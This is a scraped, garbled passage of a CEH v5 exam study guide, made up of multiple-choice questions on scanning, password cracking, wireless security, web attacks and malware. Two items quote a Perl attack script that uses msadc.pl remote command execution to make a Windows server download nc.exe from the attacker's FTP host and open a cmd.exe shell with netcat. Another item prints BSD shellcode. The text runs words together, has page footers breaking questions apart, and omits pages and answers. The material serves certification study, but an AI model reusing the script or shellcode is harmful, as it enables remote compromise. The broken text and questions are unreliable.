What can you conclude from the above nmap results?(Select the Best Answer)
• The system is a Windows Domain Controller
• The system is not firewall enabled
• The system is not running Linux or Solaris
• The system is not properly patched
You have retrieved the raw hash values from a Windows 2000 DomainController. Using social engineering, you come to
know that they are enforcing strong passwords. You understand that all users arerequired to use passwords that are at
least 8 characters in length. All passwords must also use 3 of the 4 followingcategories: lower case letters, capital letters,
numbers and special characters.
With your given knowledge of users, likely user account names and thepossibility that they will choose the easiest passwordspossible, what would be the fastest type of password cracking attack you can run
against these hash values and still getresults?(Select the Best Answer)
• Encryption Attack
• Dictionary Attack
• Brute Force Attack
Hybrid Attack
You are having trouble obtaining accurate results while conducting a port scan
against a target network. You check for thepresence of any security devices between you and the target system. When both
stealth and connect scans do not work,you decide to perform a NULL scan with NMAP. The first few systems scanned
shows all ports open. Which one of the following
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 55/90
statements is most probably true?(Select the Best Answer)
• The systems have all ports open
• The systems are running a host based IDS
• The systems are Web Servers
• The systems are running Windows
The programmers on your team are analyzing the free, open source software
being used to run FTP services on a serverin your organization. They notice that there is excessive number of functions in
the source code that might lead to bufferoverflow. These C++ functions do not check bounds. Identify the line in the
source code that might lead to buffer overflow?
#include >stdio.h<void stripnl(char *str) {while(strlen(str) && ( (str[strlen(str) - 1] == 13) ||
( str[strlen(str) - 1] == 10 ))) {str[strlen(str) - 1] = 0;
}}
int main() {FILE *infile;
char fname[40];
char line[100];int lcount; /* Read in the filename */
printf("Enter the name of a ascii file: ");
fgets(fname, sizeof(fname), stdin);
/* We need to get rid of the newline char. */ stripnl(fname);
/* Open the file. If NULL is returned there was an error */ if((infile = fopen(fname, "r")) == NULL) {
printf("Error Opening File.\n");exit(1);
} while( fgets(line, sizeof(line), infile) != NULL ) {
/* Get each line from the infile */
lcount++; /* print the line number and data */
printf("Line %d: %s", lcount, line);
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 56/90
}fclose(infile); /* Close the file */
}(Select the Best Answer)9
201732
35
A client has approached you with a penetration test requirement. They are
concerned with the possibility of external threat,and have invested considerable resources in protecting their Internet exposure.
However, their main concern is the possibility
of an employee elevating his/her privileges and gaining access to informationoutside of their department. What kind of penetrationtest would you recommend that would best address the client's concern?
(Select the Best Answer)A Black Box testA Black Hat test
A Grey Box test
A Grey Hat testA White Box test
A White Hat test
You have been using the msadc.pl attack script to execute arbitrary commandson an NT4 web server. While it is effective,you find it tedious to perform extended functions. On further research you come
across a perl script that runs the followingmsadc functions:
system("perl msadc.pl -h $host -C \"echo open $your <sasfile\"");system("perl msadc.pl -h $host -C \"echo $user<<sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass<<sasfile\"");system("perl msadc.pl -h $host -C \"echo bin<<sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe<<sasfile\"");system("perl msadc.pl -h $host -C \"echo get hacked.html<<sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit<<sasfile\"");system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
$o=>STDIN<; print "Opening ...\n";system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");What kind of exploit is indicated by this script?
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 57/90
(Select the Best Answer)A buffer overflow exploit
A SUID exploitA SQL injection exploitA chained exploit
A buffer under run exploit Item 24
What is the expected result of the following exploit?################################################################
#$port = 53; # Spawn cmd.exe on port X
$your = "192.168.1.1"; # Your FTP Server$user = "Anonymous"; # login as
$pass = '[email protected]'; # password
#################################################################$host = $ARGV[0];
print "Starting ...\n";print "Server will download the file nc.exe from $your FTP server.\n";system("perl msadc.pl -h $host -C \"echo open $your <sasfile\"");system("perl msadc.pl -h $host -C \"echo $user<<sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass<<sasfile\"");system("perl msadc.pl -h $host -C \"echo bin<<sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe<<sasfile\"");system("perl msadc.pl -h $host -C \"echo get hacked.html<<sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit<<sasfile\"");print "Server is downloading ...\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");print "Press ENTER when download is finished ... (That's why it's good to have
your own ftp server)\n";$o=>STDIN<; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");print "Done.\n";#system("telnet $host $port"); exit(0);
(Select the Best Answer)
Opens up a telnet listener that requires no username or passwordCreates an FTP server with write permissions enabled
Creates a share called ''sasfile'' on the target systemCreates an account with a username of Anonymous and a password of
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 58/90
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 59/90
within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2193;rev:1;)
From the options below, choose the exploit against which this rule applies?(Select the Best Answer)WebDav
SQL SlammerMS Blaster
IIS Unicode
A user on your Windows 2000 network has discovered that he can useL0phtcrack to sniff the SMB exchanges which carryuser logons. The user is plugged into a hub with 23 other systems. However, he
is unable to capture any logons though
he knows that other users are logging on. What do you think is the most likelyreason behind this?(Select the Best Answer)
There is a NIDS present on that segment
Kerberos is preventing it
Windows logons cannot be sniffedL0phtcrack only sniffs logons to web servers
While performing a ping sweep of a subnet you receive an ICMP reply of Code3/Type 13 for all the pings you have sentout. What is the most likely cause behind this?
(Select the Best Answer)
The firewall is dropping the packets
An in-line IDS is dropping the packetsA router is blocking ICMP
The host does not respond to ICMP packets
You are performing a port scan with nmap. You are in hurry and conducting thescans at the fastest possible speed. However,you don't want to sacrifice reliability for speed. If stealth is not an issue, what kind
of scan would you run and yet get veryreliable results?(Select the Best Answer)
Stealth scan
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 60/90
XMAS scanFragmented packet scan
Connect scan
A file integrity program such as Tripwire protects against Trojan horse attacks by:(Select the Best Answer)
• automatically deleting Trojan horse programs
• helping you catch unexpected changes to a system utility file that
might indicate it had been replaced by a Trojan horse
• rejecting packets generated by Trojan horse programs
• using programming hooks to inform the kernel of Trojan horse behaviour
~DELETED~
You want to carry out session hijacking on a remote server. The server and theclient are communicating via TCP after asuccessful TCP three way handshake. The server has just received packet #120
from the client. The client has a receivewindow of 200 and the server has a receive window of 250. Within what range of
sequence numbers should a packet, sentby the client fall in order to be accepted by the server?
(Select the Best Answer)200-250
121-371*
120-321121-231120-370
While reviewing the results of a scan run against a target network you come
across the following:system.sysDescr.0 : DISPLAY STRING- (ascii): Cisco Internetwork
OperatingSystem SoftwareIOS (tm) 4500 Software (C4500-IS-M),Version 12.0(9), RELEASE SOFTWARE (fc1)Copyright (c) 1986-2000 by cisco
Systems, Inc.Compiled Tue 25-Jan-00 04:28by bettylsystem.sysObjectID.0 : OBJECT
IDENTIFIER:.iso.org.dod.internet.private.enterprises.cisco.catProd.cisco4700system.sysUpTime.: Timeticks: (156398017) 18 days,
2:26:20.17system.sysContact.0 : DISPLAY STRING- (ascii):system.sysName.0 :DISPLAY
STRING- (ascii): somerrouternamesystem.sysLocation.0 : DISPLAY STRING-
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 61/90
(ascii):system.sysServices.0 : INTEGER:6system.sysORLastChange.0 : Timeticks: (0) 0:00:00.00
What was used to obtain this output?(Select the Best Answer)A Bo2k system query
nmap protocol/port scanHping2 diagnosis
An SNMP walk
While performing ping scans into a target network you get a frantic call from theorganization's security team. They reportthat they are under a denial of service attack. When you stop your scan, thesmurf attack event stops showing up on the
organization's IDS monitors. How can you modify your scan to prevent triggering
this event in the IDS?(Select the Best Answer)Scan more slowly
Do not scan the broadcast IP
Spoof the source IP address
Only scan the Windows systems
Using PKI, When Alice wishes to send a secret message to Bob, she looks up
Bob's public key in a directory, uses it toencrypt the message and sends it off. Bob then uses his private key to decryptthe message and read it. No one listening
in can decrypt the message. Anyone can send an encrypted message to Bob butonly Bob can read it. Thus, although many
people may know the public key of a Bob and use it to verify Bob's signatures,they cannot discover Bob's private key anduse it to forge digital signatures. This is referred to as the principle of:
(Select the Best Answer)IrreversibilityNon-repudiation
SymmetryAsymmetry
You are gathering competitive intelligence on an organization. You notice thatthey have jobs listed on a few Internet job-hunting
sites. There are two jobs for network and system administrators. How can this
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 62/90
help you in footprinting the organization?(Select the Best Answer)
The IP range used by the target networkAn understanding of the number of employees in the companyHow strong the corporate security policy is
The types of operating systems and applications being used
Bob waits near a secured door, holding a box. He waits until an employee walksup to the secured door and uses the special
card in order to access the restricted area of the target company. Just as theemployee opens the door, Bob walks up tothe employee (still holding the box) and asks the employee to hold the door openso that he can enter. What is the best
way to undermine the social engineering activity of tailgating?
(Select the Best Answer)• issue special cards to access secured doors at the company and provide
a one-time only brief description of use of the special
• card
• to post a sign that states ''no tailgating'' next to the special card reader
adjacent to the secured door
• setup a mock video camera next to the special card reader adjacent to the
secured door
• to educate all of the employees of the company on best security
practices on a recurring basis
In order to attack a wireless network, you put up an access point and override thesignal of the real access point. As users
send authentication data, you are able to capture it. What kind of attack is this?(Select the Best Answer)
Rogue access point attack
Unauthorized access point attack
Drive by hacking
WEP attack
Bob has a good understanding of cryptography, having worked with it for manyyears. Cryptography is used to secure data
from specific threats, but it does not secure the application from coding errors. Itcan provide data privacy, integrity and enable
strong authentication but it cannot mitigate programming errors. What is a good
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 63/90
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 64/90
Unfortunately unauthorized users are still able to connect to the wireless network.Why do you think this is possible?
(Select the Best Answer)Bob forgot to turn off DHCPAll access points are shipped with a default SSID
The SSID is still sent inside both client and AP packetsBob's solution only works in ad-hoc mode
In an attempt to secure his wireless network, Bob implements a VPN to cover thewireless communications he is using inhis office. Soon after the implementation, users begin complaining about thewireless network slowing down. After benchmarking
the network's speed, Bob discovers that throughput has dropped by almost half,
even though the number of users has remainedthe same. What do you think is the reason behind this?(Select the Best Answer)
The stronger encryption used by the VPN slows down the network
Using a VPN with wireless doubles the overhead on an access point for all direct
client to access point communicationsVPNs use larger packets than wireless networks normally do
Using a VPN on wireless automatically enables WEP, which causes additionaloverhead
In an attempt to secure his 802.11b wireless network, Bob decides to use
strategic antenna positioning. He places the antennasfor the access points near the center of the building. For those access points
near the outer edge of the building he usessemi-directional antennas that face towards the buildings center. There is a largeparking lot and outlying field surrounding
the building that extends out half a mile around the building. Bob figures that withthis and his placement of antennas, hiswireless network will be safe from attack. Which of the following statements is
true?(Select all that apply)
• With the 300 foot limit of a wireless signal, Bob's network is safe
• Wireless signals can be detected from miles away; Bob's network is
not safe
• Bob's network will be safe but only if he doesn't switch to 802.11a
• Bob's network will not be safe until he also enables WEP
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 65/90
Bob reads an article about how insecure wireless networks can be. He getsapproval from his management to implement
a policy of not allowing any wireless devices on the network. What other stepsdoes Bob need to take to successfully implementthis?
(Select all that apply)Train users in the new policy
Disable all wireless protocols at the firewallDisable SNMP on the network so wireless devices cannot be configured
Continuously survey the area for wireless devices
Purchase a device that jams wireless signals
You wish to determine the operating system and type of web server being used.
At the same time you wish to arouse nosuspicion within the target organization. While some of the methods listed below
will work, which holds the least risk of detection?(Select the Best Answer)
Make some phone calls and attempt to retrieve the information using socialengineering
Use nmap in paranoid mode and scan the web serverTelnet to the web server and issue commands to illicit a response
Use the netcraft web site to look for the target organization's web
application
An attacker has been successfully modifying the purchase price of items
purchased at a web site. The security administratorsverify the web server and Oracle database have not been compromised directly.
They have also verified the IDS logs andfound no attacks that could have caused this. What is the mostly likely way the
attacker has been able to modify the price?(Select the Best Answer)
By changing hidden form values in a local copy of the web page
By using cross site scripting
By using SQL injectionThere is no way the attacker could do this without directly compromising either
the web server or the database
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 66/90
You are the security administrator for a large network. You want to preventattackers from running any sort of traceroute
into your DMZ and discovering the internal structure of publicly accessible areasof the network. How can you achieve this?(Select the Best Answer)
Block ICMP at the firewall
Block UDP at the firewall
Both A and B aboveThere is no way to completely block tracerouting into this area
You are attempting to map out the firewall policy for an organization. You
discover your target system is one hop beyondthe firewall. Using hping2, you send SYN packets with the exact TTL of the targetsystem starting at port 1 and going up
to port 1024. What is this process known as?(Select the Best Answer)
Footprinting
Firewalking
EnumerationIdle scanning
Jim's organization just completed a major Linux roll out and now all of theorganization's systems are running the Linux 2.5
kernel. The roll out expenses has posed constraints on purchasing otheressential security equipment and software. The
organization requires an option to control network traffic and also perform statefulinspection of traffic going into and outof the DMZ. Which built-in functionality of Linux can achieve this?
(Select the Best Answer)
IP Tables
IP Chains
IP SnifferIP ICMP
Jim was having no luck performing a penetration test on his company's network.
He was running the test from home and
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 67/90
had downloaded every security scanner he could lay his hands on. Despiteknowing the IP range of all of the systems, and
the exact network configuration, Jim was unable to get any useful results. Why isJim having these problems?(Select the Best Answer)
Security scanners are not designed to do testing through a firewallSecurity scanners cannot perform vulnerability linkage
Security scanners are only as smart as their database and cannot find
unpublished vulnerabilities
All of the above
An attacker is attempting to telnet into a corporation's system in the DMZ. Theattacker doesn't want to get caught and is
spoofing his IP address. After numerous tries he remains unsuccessful in
connecting to the system. The attacker rechecksthat the target system is actually listening on Port 23 and he verifies it with bothnmap and hping2. He is still unable to connectto the target system. What could be the reason?(Select the Best Answer)
The firewall is blocking port 23 to that system
He cannot spoof his IP and successfully use TCP
He needs to use an automated tool to telnet inHe is attacking an operating system that does not reply to telnet even when open
Bill has successfully executed a buffer overflow against a Windows IIS webserver. He has been able to spawn an interactive
shell and plans to deface the main web page. He first attempts to use the ''Echo''command to simply overwrite index.html
and remains unsuccessful. He then attempts to delete the page and achieves noprogress. Finally, he tries to overwrite
it with another page in which also he remains unsuccessful. What is the probablecause of Bill's problem?
(Select the Best Answer)The system is a honeypot
There is a problem with the shell and he needs to run the attack againYou cannot use a buffer overflow to deface a web page
The HTML file has permissions of read only
While investigating a claim of a user downloading illegal material, the investigator
goes through the files on the suspect's
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 68/90
workstation. He comes across a file that is just called ''file.txt'' but when he opensit, he finds the following:
#define MAKE_STR_FROM_RET(x) ((x)&0xff),(((x)&0xff00)<<8),(((x)&0xff0000)<<16),(((x)&0xff000000)<<24)char infin_loop[]= /* for testing purposes */
"\xEB\xFE";char bsdcode[] = /* Lam3rZ chroot() code by venglin */ "\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0""\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0"
"\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80""\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9"
"\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75""\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd"
"\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46"
"\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56""\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53""\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01\xff\xff\x30"
"\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e""\x67\x6c\x69\x6e";static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];static char *magic_str=NULL;
int before_len=0;What can he infer from this file?
(Select the Best Answer)A picture that has been renamed with a .txt extension
An encrypted fileA uuencoded file
A buffer overflow
During the scanning portion of his penetration test, Ed discovered a handful of
Oracle servers. Later, Ed found that thoseOracle servers were being used by the web servers to retrieve information. Ed
decided that he should try some SQL injectionattacks in order to read information out of the Oracle servers. He opens the web
page in his browser and begins injectingcommands. After hours of attempts, Ed is having no luck getting even a small
amount of information out of the databases.What is the probable cause of this?
(Select the Best Answer)
You cannot do SQL injection against Oracle database
You must directly connect to the database instead of using the web server
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 69/90
You cannot use a web browser to perform SQL injectionEd is not using SQL Plus to inject commands
Fingerprinting an Operating System helps a cracker because:
(Select the Best Answer)It defines exactly what software you have installedIt opens a security-delayed window based on the port being scanned
It informs the cracker of which vulnerabilities he may be able to exploit on
your system
It doesn't depend on the patches that have been applied to fix existing securityholes
A program that defends against a port scanner will attempt to:
(Select the Best Answer)Update a firewall rule in real time to prevent the port scan from being completedSends back bogus data to the port scannerLimit access by the scanning system to publicly available ports only
Log a violation and recommend use of security-auditing tools
A distributed port scan operates by:(Select the Best Answer)using denial-of-service software against a range of TCP ports
having multiple computers each scan a small number of ports, thencorrelating the results
blocking access to the targeted host by each of the distributed scanning clients
blocking access to the scanning clients by the targeted host
An nmap command that includes the host specification of 202.176.56-57.* will
scan _______ number of hosts. (Choosethe best answer)
(Select the Best Answer)
512
2256
Over 10,000
You are concerned that someone running PortSentry could block your scans,
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 70/90
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 71/90
IDS without notice because they are insidelegal HTTP requests. Bret is determined to weed out any vulnerabilities. What
are some common vulnerabilities in web applicationsthat he should be concerned about?(Select the Best Answer)
Un-validated parameters, broken access control, broken account andsession management, cross-side scripting and buffer
overflows are just a few common vulnerabilities
Visible clear text passwords, anonymous user account set as default, missing
latest security patch, no firewall filters setand no SSL configured are just a few common vulnerabilitiesNo SSL configured, anonymous user account set as default, missing latest
security patch, no firewall filters set and an inattentivesystem administrator are just a few common vulnerabilities
No IDS configured, anonymous user account set as default, missing latest
security patch, no firewall filters set and visibleclear text passwords are just a few common vulnerabilities
Jimmy an attacker knows that he can take advantage of poorly designed input
validation routines to create or alter SQLcommands to gain access to unintended data or execute commands in the
database. What technique does this describethat Jimmy is willing to use to compromise a database?(Select the Best Answer)
Jimmy can submit user input that executes an operating system command tocompromise a target system
Jimmy can utilize this particular database threat which is a SQL injection
technique to penetrate a target system
Jimmy can gain control of system to flood the target system with requests,
preventing legitimate users from gaining accessJimmy can utilize an incorrect configuration that leads to access with higher-than-
expected privilege of the database
June, a security analyst, understands that a polymorphic virus has the ability tomutate and can change its known viral signature
and hide from signature-based antivirus programs. How can June use anantivirus program in this case and would it beeffective against a polymorphic virus?
(Select the Best Answer)Yes. June can use an antivirus program since it compares the parity bit of
executable files to the database of known check
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 72/90
sum counts and it is effective on a polymorphic virusYes. June can use an antivirus program since it compares the signatures of
executable files to the database of known viralsignatures and it is very effective against a polymorphic virus
No. June can't use an antivirus program since it compares the signatures
of executable files to the database of known viralsignatures and in the case the polymorphic viruses cannot be detected by
a signature-based anti-virus program
No. June can't use an antivirus program since it compares the size of executablefiles to the database of known viral signatures
and it is effective on a polymorphic virus
Rebecca is a security analyst and is savvy of a well known local root exploit that
has the ability of enabling local users to
use available exploits to gain root privileges. This vulnerability exploits acondition in the Linux kernel within the execve()system call. There is no known workaround that exists for this vulnerability. What
is the correct action to be taken by Rebeccain this situation as a recommendation to management?
(Select the Best Answer)Rebecca should make a recommendation to disable the execve() system call
Rebecca should make a recommendation to upgrade the Linux kernel
promptly
Rebecca should make a recommendation to set all child-process to sleep within
the execve()Rebecca should make a recommendation to hire more system administrators tomonitor all child processes to ensure thateach child process can't elevate privilege
Statistics from cert.org and other leading security organizations has clearly
showed a steady increase in the number of hackingincidents against companies. What do you think is the main reason we have
seen such a huge increase in hacking attemptsover the past years?
(Select the Best Answer)it is getting harder to hack and more challenging for non technical people
increase in processing powernew TCPIP stack features are constantly being added
the ease of getting hacker tools on the Internet
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 73/90
What does the term ''Ethical Hacking'' mean?(Select the Best Answer)
Someone who is hacking for ethics reasonsSomeone who is using their skills for ethics reasons
Someone who is using their skills for defensive purposes
Someone who is using their skills for offensive purposes
What is the key difference between an 'Ethical Hacker' and a 'Cracker'?(Select the Best Answer)
The ethical hacker does not use the same techniques or skillsThe ethical hacker does it strictly for financial motives
The ethical hacker has authorization from the owner of the target
The ethical hacker is just a cracker that is getting paid
Ethical Hacking and Countermeasures v3
Which of the following best describes Vulnerability?(Select the Best Answer)
A weakness or error that can lead to a compromise
An agent that could take advantage of a weaknessAn action or event that might prejudice security
The loss potential of a threat
When a malicious hacker identifies a target and wants to eventually compromisethis target, what would be the first stepthe attacker would perform?
(Select the Best Answer)Cover his tracks by eradicating the log files
Gain access to the remote computer for identification of venue of attacks
Perform a reconnaissance of the remote target for identification of venue of
attacks
Always starts with a scan in order to quickly identify venue of attacks
What does the term 'Hacktivism' means?
(Select the Best Answer)Someone that has an urge to constantly hack
Someone who is hacking for a cause
Someone who has at least 12 years of hacking experienceSomeone who subscribe to hacker's magazine
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 74/90
‘]What are the three phases of security testing?
(Select the Best Answer)
Preparation, Conduct, Conclusion
Preparation, Scans, Conclusion
Reconnaissance, Scans, ReportingPreparation, Conduct, BillingEthical Hacking and Countermeasures v3
Clive has been hired to perform a Black-Box test by one of his clients. How muchinformation will Clive be able to get fromthe client before commencing his test?(Select the Best Answer)
IP Range, OS, and patches installed
Only the IP address rangeNothing but corporate name
All that is available from the client
Which of the following activities would not be considered passive footprinting?
(Select the Best Answer)Go through the rubbish to find out any information that might have been
discarded
Search on financial site such as Yahoo FinancialScan the range of IP address found in their DNS database
Perform multiple queries through a search engine
What are the four existing Regional Internet Registry (RIR's)?(Select the Best Answer)
APNIC, PICNIC, ARIN, LACNIC
RIPE NCC, LACNIC, ARIN, APNIC
RIPE NCC, NANIC, ARIN, APNICRIPE NCC, ARIN, APNIC, LATNIC
When referring to the Domain Name Service, what is a 'zone'?(Select the Best Answer)
It is the first domain that belong to a company
It is a collection of resource records
It is the first resource record type in the SOA
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 75/90
It is a collection of domains
How does traceroute map the route a packet travels from point A to point B?(Select the Best Answer)
It uses a TCP timestamp packet that will illicit a time exceeded in transit messageIt uses a protocol that will be rejected by gateways on it's way to the destination
It manipulates the value of the time to live (TTL) within packet to illicit a
time exceeded in transit message
It manipulates the flags within packets to force gateways into generating error
messages
What is the purpose of firewalking?
(Select the Best Answer)
It's a technique used to discover Wireless network on footIt's a technique used to map routers on a network link
It's a technique used to discover what rules are configured on a gateway
It's a technique used to discover interface in promiscuous mode
Which of the following would be the best reason for sending a single SMTP
message to an address that does not exist withinthe target company?(Select the Best Answer)
To create a denial of service attackTo verify information about the Mail administratorTo gather information about internal hosts used in email treatment
To gather information about procedure in place to deal with such
messages
War dialing is a very old attack as it was depicted in movies that were madeyears ago. Why would a modern security tester
consider making use of such an old technique?(Select the Best Answer)It is cool, if it works in movie it must work in real life
It allows circumvention of protection mechanisms by being on the internal
network
It allows circumvention of company PBX
A good security tester would not use such a derelict technique
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 76/90
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 77/90
most likely to be listening on those ports?(Select the Best Answer)
FingerFTPSamba
SMB
Bryce is using the nslookup command to craft queries to list all DNS information(such as Name Servers, host names, MX
records, CNAME records, glue records (delegation for child Domains), zoneserial number, Time To Live (TTL) records,etc) for a Domain. What type of function is Bryce trying to accomplish?(Select the Best Answer)
A zone harvesting
A zone transferA zone updateA zone estimate
SNMP is a protocol used to query hosts, servers, and devices about performanceor health status data. This protocol has
long been used by hackers to gather great amount of information about remotehosts. Which of the following features makes
this possible?
(Select all that apply)It uses TCP as the underlying protocol
It uses community string sent in as clear text
It is susceptible to sniffingIt is used by ALL devices on the market
Attackers can potentially intercept and modify unsigned SMB packets, modify thetraffic and forward it so that the server
might perform undesirable actions. Alternatively, the attacker could pose as theserver or client after a legitimate authentication
and gain unauthorized access to data. Which of the following is NOT a meansthat can be used to minimize or protect againstsuch an attack?
(Select all that apply)
SMB Signing
Timestamps
File permissions
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 78/90
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 79/90
Give user the least amount of privileges
Give users two passwords
Give users a strong policy document
Bob is doing a password assessment for one of his clients. Bob suspects thatpolicies are not in place and weak passwordsare probably the norm throughout the company he is evaluating. Bob is familiar
with password weaknesses and key loggers.What are the means that Bob can use to get password from his client hosts and
servers?(Select the Best Answer)Hardware, Software, and Sniffing
Hardware and Software Keyloggers
Passwords are always best obtained using Hardware key loggers
Software only, they are the most effective
Windows LAN Manager (LM) hashes are known to be weak. Which of thefollowing are weaknesses of LM?
(Select all that apply)
Converts password to uppercase
Hashes are sent in clear over the networkMakes use of only 32-bit encryption
Effective length is 7 characters
An attacker has successfully compromised a remote computer. Which of the
following comes as one of the last steps thatshould be taken to ensure that the compromise cannot be traced back to thesource of the problem?
(Select the Best Answer)Install patchesSetup a backdoor
Cover your tracks
Install a zombie for DDOS
A buffer overflow occurs when a program or process tries to store more data in abuffer (temporary data storage area) than
it was intended to hold. What is the most common cause of buffer overflow insoftware today?
(Select the Best Answer)
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 80/90
Bad permissions on filesHigh bandwidth and large number of users
Usage of non standard programming languages
Bad quality assurance on software produced
Which of the following statements would NOT be a proper definition for a Trojan
Horse?(Select the Best Answer)
An unauthorized program contained within a legitimate program. Thisunauthorized program performs functions unknown(and probably unwanted) by the userA legitimate program that has been altered by the placement of unauthorized
code within it; this code performs functions
unknown (and probably unwanted) by the userAn authorized program that has been designed to capture keyboard
keystroke while the user is unaware of such activity
being performedAny program that appears to perform a desirable and necessary function but that
(because of unauthorized code within
it that is unknown to the user) performs functions unknown (and definitelyunwanted) by the user
In the context of Trojans, what is the definition of a Wrapper?(Select the Best Answer)
An encryption tool to protect the Trojan
A tool used to bind the Trojan with a legitimate file
A tool used to encapsulate packets within a new header and footer
A tool used to calculate bandwidth and CPU cycles wasted by the Trojan
Neil is very closely monitoring his firewall rules and logs on a regular basis.Some of the users have complained to Neil
that there are a few employees who are visiting offensive web site during workhours, without any consideration for others.
Neil knows that he has an up-to-date content filtering system and such accessshould not be authorized. What type of technique
might be used by these offenders to access the Internet without restriction?(Select the Best Answer)
They are using UDP which is always authorized at the firewall
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 81/90
They are using tunneling software which allows them to communicate with
protocols in a way it was not intended
They have been able to compromise the firewall, modify the rules, and give
themselves proper accessThey are using an older version of Internet Explorer that allow them to bypass
the proxy server
Virus Scrubbers and other malware detection program can only detect items theyknow about. Which of the following tool
would allow you to detect unauthorized changes or modification of binary files onyour system by unknown malware?
(Select the Best Answer)
File integrity verification tools
Anti-Virus Software
A properly configured gatewayThere is no way of finding out until a new updated signature file is released
Snort is an open source Intrusion Detection System. However, it can also be
used for a few other purposes such as a sniffer.Which of the choices below are the proper features offered by Snort?
(Select the Best Answer)IDS, Packet Logger, SnifferIDS, Firewall, Sniffer
IDS, Sniffer, ProxyIDS, Sniffer, content inspector
Windump is a Windows port of the famous TCPDump packet sniffer available ona variety of platforms. In order to use this
tool on the Windows platform you must install a packet capture library. What isthe name of this library?(Select the Best Answer)
NTPCAPLibPCAP
WinPCAP
PCAP
Eric has discovered a fantastic package of tools named Dsniff on the Internet. Helearnt to use these tools in his lab and
is now ready for real world exploitation. He was able to effectively intercept
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 82/90
communications between two entities and establishcredentials with both sides of the connections. The two remote ends of the
communication never notice that Eric was relayingthe information between the two. How would you call this attack?(Select the Best Answer)
InterceptorMan-in-the-middle
Arp Proxy
Poisoning Attack
Samantha was hired to perform an internal security test of company XYZ. Shequickly realized that all networks are makinguse of switches instead of traditional hubs. This greatly limits her ability to gather
information through network sniffing. Which
of the following techniques could she use to gather information from the switchednetwork or to disable some of the trafficisolation feature of the switch?
(Select all that apply)Ethernet Zapping
MAC FloodingSniffing in promiscuous mode
Arp Spoofing
What is the goal of a Denial of Service attack?(Select the Best Answer)Capture files from a remote computer
Render a network or computer incapable of providing normal serviceExploit a weakness in the TCP stack
Item 106Bryce the bad boy is purposely sending fragmented ICMP packets to a remotetarget. The total size of this ICMP packet
